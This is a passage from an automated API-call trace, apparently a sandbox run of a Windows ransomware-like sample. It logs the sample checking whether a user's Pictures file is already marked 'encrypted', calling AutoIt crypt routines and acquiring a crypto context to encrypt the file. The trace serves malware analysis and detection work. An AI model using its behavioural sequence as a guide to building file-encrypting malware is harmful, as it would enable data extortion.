cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fpZd.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.301] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0039.301] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.301] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.301] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.301] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.301] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.301] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0039.301] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.302] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.302] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.302] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44d72d00, ftCreationTime.dwHighDateTime=0x1d5b912, ftLastAccessTime.dwLowDateTime=0x9572e040, ftLastAccessTime.dwHighDateTime=0x1d5bcd4, ftLastWriteTime.dwLowDateTime=0x9572e040, ftLastWriteTime.dwHighDateTime=0x1d5bcd4, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="AfpZd.png", cAlternateFileName="")) returned 0x7c2100 [0039.302] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0039.302] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.302] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.302] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.302] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.302] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0039.303] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.303] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.303] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.303] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.304] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.304] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.305] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.305] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.305] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.305] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.305] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.305] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.306] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.306] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.306] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.306] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.306] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.306] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.306] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0039.306] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0039.306] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.306] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.306] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.306] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0039.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.307] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.307] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.307] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0039.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.307] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.307] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.307] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.307] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0039.307] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.308] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.308] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.308] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 